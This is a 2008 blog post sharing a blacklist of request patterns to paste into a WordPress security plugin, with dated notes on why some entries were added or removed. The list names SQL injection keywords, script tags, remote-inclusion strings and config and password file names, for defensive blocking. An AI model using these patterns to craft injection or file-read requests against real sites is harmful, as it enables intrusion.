Herself’s Webtools

** 7/15/08 Turn off the security script while you do the update

Now your WP Security plugin only catches bad bots if you tell it who the bad bots are and what requests to blog. This is my current list of bad requests. You can just copy and paste it into the request blacklist after your current list and hit the update button and it will add them to your list.

8/29/08

$_GET
(java|vb)
.gif?
.jpg?
.txt?
.xml?
</script>
<SCRIPT>
?page_id=http%3A%2F%2F
admin-ajax.php?
admin-function.php?
ASCII
board.php?see=ftp
CAST
com_jd-wp
CONCAT
DECLARE
DELETE
formmail
includedir=
index.php?template=
INSERT
lwp-trivial
OPTIONS
passwd
PATH=
POST /xmlrpc.php
PROPFIND
register++++
SELECT
sidebar.php?
UNION
UPDATE
word-tube-button.php?
wp-config
wp-login.php?action=http%3A%2F%2F
wp-table-button.php?
wp-trackback.php?
x-aaaaaaaaa

I’m also checking Emerging Threats Rules downloads, it is a great site to learn a bit more about security. Go to emerging web_sql and scroll down to the WordPress section.

8/28/08
<SCRIPT>
</script>

8/11/08
CAST
DECLARE

Grumpy old man emailed to tell me a MySQL injection attack had been tried on his site using these terms that had not been caught by the security tool. I’m adding them to my list today and suggest you do as well. See SQL injection attack using DECLARE or New SQL Injection Attack Infecting Machines for more details.

7/16/08
Removed wp-login.php?redirect_to=http%3A%2F%2F it keeps tripping on WP 2.6

7/9/08 All of these were part of several attempted but failed hacks recently
com_jd-wp
index.php?template=
board.php?see=ftp

7/6/08 I added ‘PATH=’ to the list

New additions 6/18/08 ( still testing these )
passwd

New addition 6/17/08
$_GET

New addition 6/15/08
register+++

New addition 6/13/08:
.gif?
.jpg?